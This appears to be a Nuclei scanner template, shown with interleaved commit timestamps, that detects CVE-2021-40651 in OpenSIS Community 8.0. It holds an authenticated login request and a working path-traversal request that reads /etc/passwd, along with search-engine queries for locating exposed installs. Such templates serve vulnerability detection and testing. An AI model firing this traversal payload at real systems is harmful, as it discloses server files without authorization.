2023-10-06 04:44:43 +00:00
id : CVE-2021-40651
info :
name : OS4Ed OpenSIS Community 8.0 - Local File Inclusion
author : ctflearner
severity : medium
2023-10-08 07:33:15 +00:00
description : |
OS4Ed OpenSIS Community 8.0 is vulnerable to a local file inclusion vulnerability in Modules.php (modname parameter), which can disclose arbitrary file from the server's filesystem as long as the application has access to the file.
2023-10-06 04:44:43 +00:00
reference :
- https://www.exploit-db.com/exploits/50259
- https://github.com/MiSERYYYYY/Vulnerability-Reports-and-Disclosures/blob/main/OpenSIS-Community-8.0.md
- https://www.youtube.com/watch?v=wFwlbXANRCo
2024-02-05 05:28:25 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-40651
2024-05-31 19:23:20 +00:00
- https://github.com/ARPSyndicate/cvemon
2023-10-06 04:44:43 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score : 6.5
cve-id : CVE-2021-40651
cwe-id : CWE-22
2024-05-31 19:23:20 +00:00
epss-score : 0.02562
epss-percentile : 0.90208
2023-10-06 04:44:43 +00:00
cpe : cpe:2.3:a:os4ed:opensis:8.0:*:*:*:community:*:*:*
2023-10-08 07:33:15 +00:00
metadata :
2024-03-04 08:20:22 +00:00
max-request : 2
2024-04-08 11:34:33 +00:00
vendor : os4ed
2024-05-31 19:23:20 +00:00
product : opensis
2024-06-07 10:04:29 +00:00
shodan-query :
- "title:\"openSIS\""
- http.title:"opensis"
2024-05-31 19:23:20 +00:00
fofa-query : title="opensis"
google-query : intitle:"opensis"
2024-02-05 05:28:25 +00:00
tags : cve,cve2021,lfi,os4ed,opensis,authenticated
2023-10-06 04:44:43 +00:00
http :
2024-02-05 05:28:25 +00:00
- raw :
- |
POST /index.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
2023-10-08 07:33:15 +00:00
2024-02-05 05:28:25 +00:00
USERNAME={{username}}&PASSWORD={{password}}&language=en&log=
- |
GET /Modules.php?modname=miscellaneous%2fPortal.php..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&failed_login= HTTP/1.1
Host : {{Hostname}}
2023-10-06 04:44:43 +00:00
2024-02-05 05:28:25 +00:00
matchers :
- type : dsl
dsl :
- "regex('root:.*:0:0:', body)"
- 'contains(body_1, "openSIS")'
- "status_code == 200"
condition : and
2024-06-08 16:02:17 +00:00
# digest: 4a0a0047304502210086742fa2cc6187bb87d4710d96915dc5e16293bedd4e9fd2384df56c6d3b9c67022024039916bbc99fdf6d41f3406d69264b4ffa79095d2dfff3b32cefa16df87433:922c64590222798bb761d5b6d8e72950